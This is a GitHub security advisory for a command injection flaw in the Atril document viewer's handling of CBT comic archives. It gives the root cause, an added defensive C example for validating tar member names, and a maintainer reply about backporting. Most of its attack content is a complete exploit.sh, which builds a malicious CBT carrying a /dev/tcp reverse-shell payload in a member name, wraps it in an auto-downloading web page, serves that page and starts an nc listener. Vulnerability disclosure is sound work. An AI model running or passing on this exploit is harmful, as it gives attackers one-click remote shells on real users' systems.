Critical Remote Code Execution Vulnerability in Atril's CBT comic book parsing
Severity: Critical
lukefromdc published GHSA-34rr-j8v9-v4p2 on Jan 7, 2024 · 2 comments
Package: Atril
Affected versions: <= latest
Patched versions: None
Description
Summary
A Critical One-Click RCE/Command Injection Vulnerability Affecting Popular Linux Operating Systems with MATE, Cinnamon, and some Xfce desktop Environments.
Affected Operating Systems:
Kali Linux (Popular OS among Security professionals, researchers)
Parrot OS (Popular OS among Security professionals, researchers)
Ubuntu-Mate
Xubuntu
Fedora Cinnamon
Fedora Mate
Manjaro Mate
Manjaro Cinnamon
Ubuntu Kylin (Official Chinese Ubuntu)
Kylin OS V10 (OS said to be used in Chinese government sectors)
And other MATE, Cinnamon, and some Xfce desktop Environments.
Affected Software Component: All versions including the latest versions of Atril Document Viewer (Default Doc reader for MATE environment, one of the popular doc readers).
Vulnerability Summary:
This is a one-click Remote Command Execution vulnerability that gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL.
This vulnerability is due to a bad code segment in Atril responsible for handling comic book documents (.cbr, .cbz, .cbt, .cb7). Comic book documents are just archives that contain images. The vulnerability can be exploited using a maliciously crafted CBT document, which is a TAR archive.
Root Cause - Vulnerable Code segment in both doc viewers (comics-document.c):
By looking at the above code, we can see that shell commands are used for decompression. In the /* tar */ section, it calls the shell command "tar -xOf -tf " to view/load each image inside the CBT document. This behavior can be exploited through tar's '--checkpoint-action' option to execute arbitrary commands on the target, by naming one of the images inside the CBT document something like '--checkpoint-action=EXEC=bash -c "whoami>/tmp/who.txt";.jpg'.
This vulnerability was already found in the Evince document viewer (the default doc reader of GNOME) back in 2017. Since Atril is a fork of Evince, the vulnerability was present in Atril as well. Atril's team fixed it at that time by adding code that quits Atril's process if a file inside the CBT archive has "--checkpoint-action=" in its name. The following was the patch (comics-document.c) (line 983):
As you can see, it throws a "File Unsupported" message to the console and quits when it sees "--checkpoint-action=" in a page/filename. I noticed that this only works with an empty file or a really small image file, and if we provide a larger file with more bytes, the "gtk_main_quit ();" function fails, so it continues to run, thus executing the injected arbitrary command.
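The root cause above is that an archive member name reaches tar as a bare operand, so a name beginning with '-' is parsed as an option, and the 2017-era check only looks for one specific option string and relies on gtk_main_quit() to stop the process. As an added example (written in C because comics-document.c is C; this is not Atril's code and not its actual patch), the functions below treat member names as untrusted data: they reject any name starting with '-', build the tar invocation as an argument vector with a "--" separator instead of a shell command line, and walk a tar image in memory so the same check can be run on a .cbt file before a viewer or previewer ever opens it. The function names, the two-member archive built inline and the stand-in image bytes are assumptions made for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TAR_BLOCK 512

/* A member name that begins with '-' would be parsed by tar as an option
 * if it reached tar as a bare operand. Reject it, along with empty names. */
bool member_name_is_safe(const char *name)
{
    return name != NULL && name[0] != '\0' && name[0] != '-';
}

/* Build "tar -xOf ARCHIVE -- MEMBER" as an argument vector rather than a
 * shell string: no shell means no metacharacter parsing, and "--" ends
 * option parsing so a leading '-' can no longer become an option.
 * Returns argc, or 0 if the name fails validation or argv is too small. */
size_t build_tar_extract_argv(const char *archive, const char *member,
                              const char **argv, size_t argv_cap)
{
    if (argv_cap < 6 || !member_name_is_safe(member))
        return 0;
    argv[0] = "tar";
    argv[1] = "-xOf";
    argv[2] = archive;
    argv[3] = "--";
    argv[4] = member;
    argv[5] = NULL;            /* ready for execvp()/posix_spawnp() */
    return 5;
}

/* Read a NUL/space padded octal tar header field. */
static size_t tar_octal(const unsigned char *field, size_t n)
{
    size_t v = 0;
    for (size_t i = 0; i < n && field[i] >= '0' && field[i] <= '7'; i++)
        v = v * 8 + (size_t)(field[i] - '0');
    return v;
}

/* Walk a tar image held in memory and count members whose effective path
 * (ustar prefix when present, else name) fails the check. Stops at the
 * first all-zero end-of-archive block; returns -1 on a truncated image. */
int count_unsafe_members(const unsigned char *buf, size_t len)
{
    int unsafe = 0;
    size_t off = 0;
    while (off + TAR_BLOCK <= len) {
        const unsigned char *hdr = buf + off;
        if (hdr[0] == '\0')
            return unsafe;
        char name[101];
        memcpy(name, hdr, 100);
        name[100] = '\0';
        bool ustar = memcmp(hdr + 257, "ustar", 5) == 0;
        const char *path = (ustar && hdr[345] != '\0') ? (const char *)(hdr + 345) : name;
        if (!member_name_is_safe(path))
            unsafe++;
        size_t size = tar_octal(hdr + 124, 12);
        off += TAR_BLOCK * (1 + (size + TAR_BLOCK - 1) / TAR_BLOCK);
    }
    return off == len ? unsafe : -1;
}

/* Constructed fixture (not a real comic): one ustar header plus padded data. */
size_t write_ustar_member(unsigned char *out, const char *name,
                          const unsigned char *data, size_t data_len)
{
    memset(out, 0, TAR_BLOCK);
    strncpy((char *)out, name, 100);
    memcpy(out + 100, "0000644", 8);                 /* mode */
    snprintf((char *)out + 124, 12, "%011zo", data_len);
    memset(out + 148, ' ', 8);                       /* checksum placeholder */
    out[156] = '0';                                  /* regular file */
    memcpy(out + 257, "ustar", 6);
    memcpy(out + 263, "00", 2);
    unsigned sum = 0;
    for (size_t i = 0; i < TAR_BLOCK; i++)
        sum += out[i];
    snprintf((char *)out + 148, 8, "%06o", sum);     /* 6 digits, NUL, space */
    size_t padded = (data_len + TAR_BLOCK - 1) / TAR_BLOCK * TAR_BLOCK;
    memset(out + TAR_BLOCK, 0, padded);
    memcpy(out + TAR_BLOCK, data, data_len);
    return TAR_BLOCK + padded;
}

/* Constructed two-member archive (one benign, one option-like name): scan it. */
int scan_constructed_sample(void)
{
    static unsigned char image[TAR_BLOCK * 6];
    const unsigned char stub[] = { 0xFF, 0xD8, 0xFF, 0xD9 }; /* stand-in bytes, not a JPEG */
    size_t n = 0;
    n += write_ustar_member(image + n, "page-001.jpg", stub, sizeof stub);
    n += write_ustar_member(image + n, "--option-like-name.jpg", stub, sizeof stub);
    memset(image + n, 0, TAR_BLOCK * 2);             /* end-of-archive marker */
    n += TAR_BLOCK * 2;
    return count_unsafe_members(image, n);
}
```

Rejecting any leading '-' rather than one option string covers every tar option, not only --checkpoint-action, and the decision is a plain return value that does not depend on the process exiting in time. The "--" separator is the second layer: even a name that slips past validation is handed to tar as a file operand. The scanner is what a distro or a mail gateway could run over a .cbt before it reaches atril-previewer.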
In the MATE desktop environment and in many XFCE and lightweight desktop environments (including OSes like Kali, Parrot, Xubuntu, Ubuntu Mate, Kylin, Fedora Mate, Manjaro Mate), this vulnerability can be exploited just by sending a link/URL, because these operating systems/environments ship Atril, and Atril has an additional component called atril-previewer that triggers the exploit without the document even being opened or clicked. An attacker can craft a webpage that instantly downloads the crafted CBT file onto the target system when the target user visits it; the latest Firefox browser nowadays downloads automatically by default without user confirmation. When the user navigates to their Downloads directory, the payload is executed, giving the attacker a shell.
I have attached a fully working exploit with this submission.
In the demo video, the following is the scenario:
Attacker Machine - Kali Linux
Victim Machine - Kali Linux latest edition (2023.3)
Victim visits the malicious URL/Link generated by my exploit script
Exploit Dependencies: poppler-utils
Please install poppler-utils before running the exploit script on your Linux machine (Kali preferred). Installation: apt install poppler-utils.
exploit.sh
#! /bin/bash
# Requires pdftoppm from poppler-utils
banner(){
    echo "
╔╦╗┌─┐┌─┐╔╦╗┌─┐┬─┐
║║│ ││ ║ ├─┤├┬┘
═╩╝└─┘└─┘ ╩ ┴ ┴┴└─
╔═╗┌┬┐┬─┐┬┬ ╦┌┐┌ ┬┌─┐┌─┐┌┬┐
╠═╣ │ ├┬┘││───║│││ │├┤ │ │
╩ ╩ ┴ ┴└─┴┴─┘ ╩┘└┘└┘└─┘└─┘ ┴
0-day Exploit
-by Febin (@febin_nj)
[ Affected OS: Kali, Parrot OS, Linux Mint, Ubuntu-Mate, Xubuntu, Ubuntu-Kylin, Kylin OS, Fedora-Mate, Fedora-Cinnamon, Manjaro Mate, Manjaro Cinnamon ]
[ Affected Software: Atril Document viewer, Xreader ]
"
}
mainProgram(){
    printf " [>] LHOST: "
    read IP
    printf " [>] LPORT: "
    read LPORT
    printf "[>] Location to the PDF to spoof [Default: sample.pdf]: "
    read pdf_path
    pdf_path=${pdf_path:-./sample.pdf}
    export PAYLOAD="0<\&34-;exec 34<>/dev/tcp/${IP}/${LPORT};bash -i <\&34 >\&34 2>\&34"
    echo "/Creator (Adobe Acrobat)" > emptyfile
    tar -cf poc.cbt --transform="s|emptyfile|%PDF-1.4
%âã
1 0 obj
<<
/Title (TEST PDF file)
/Creator (Adobe Acrobat)
/Producer (Qt 5.15.8)
/CreationDate (D:20230812194726)
>>
endobj
|" emptyfile
    mkdir Pages 2>/dev/null
    pdftoppm ${pdf_path} Pages/Page -jpeg
    tar -uf poc.cbt Pages/*.jpg
    cp Pages/Page-1.jpg feb.jpg
    tar -P -uf poc.cbt --transform="s|feb.jpg| --checkpoint-action=exec=bash -c '$PAYLOAD';.jpg|" feb.jpg
    rm -rf emptyfile
    mkdir output/ 2>/dev/null
    mv poc.cbt output/poc.cbt
    rm -rf feb.jpg
    rm -rf Pages/
    echo "[+] Malicious Comic document is generated: $(realpath output/poc.cbt)"
    printf " Do you want to start the listener here? [Y/n]: "
    read choice
    b64data="$(cat output/poc.cbt | base64 -w0)"
    echo "
<body>
<h1>HELLO</h1>
</body>
<script>
filename = \"poc.cbt\"
filedata = \"$b64data\"
function base64tobytes(base64data){
var binaryValues = atob(base64data);
var binaryLength = binaryValues.length
var bytesData = new Uint8Array(binaryLength);
for ( var i = 0; i < binaryLength; i++){
bytesData[i] = binaryValues.charCodeAt(i);
}
return bytesData.buffer;
}
var fileBytes = base64tobytes(filedata);
var blob = new Blob([fileBytes], {\"type\":\"octet/stream\"});
var anchor = document.createElement(\"a\");
document.body.append(anchor);
anchor.style = \"display: None;\"
var url = window.URL.createObjectURL(blob);
anchor.href = url;
anchor.download = filename;
anchor.click();
window.URL.revokeObjectURL(url);
</script>
" > output/index.html
    python3 -m http.server 8888 -d output/ >/dev/null 2>&1 &
    echo "[+] Web server started on port 8888.."
    echo "[+] Send the link http://[your-ip-address]:8888/index.html to the victim."
    echo " "
    trap "killall python3; exit" INT
    if [[ ${choice} == "Y" || ${choice} == "y" ]]
    then
        trap "killall python3; exit" INT
        nc -nlvp "$LPORT"
    else
        echo "[+] Exiting.."
        killall python3
        exit
    fi
}
if [ $(which pdftoppm) ]
then
    banner
    mainProgram
else
    echo "[-] pdftoppm not found! Please install poppler-utils to run this exploit."
    exit
fi
Atril_0day_demo.2.mp4
Impact
Remote Code Execution on the target system.
The atril-previewer makes this vulnerability more dangerous, as it can be exploited with a single link/URL to achieve RCE.
On Mon, 8 Jan 2024, 3:48 am, Luke from DC wrote:
Published GHSA-34rr-j8v9-v4p2.
https://github.com/mate-desktop/atril/security/advisories/GHSA-34rr-j8v9-v4p2#event-128009
I will need assistance from the rest of the team with this! I do not even know how to edit the advisory. I do not have an account at Transifex so I cannot create a new release. This needs to be backported to 1.26 as a cherry-pick fails on a file conflict.
Distros of course can release a build of Atril (ANY version) with comics support disabled right now, then when this gets backported to 1.26 push that out the door.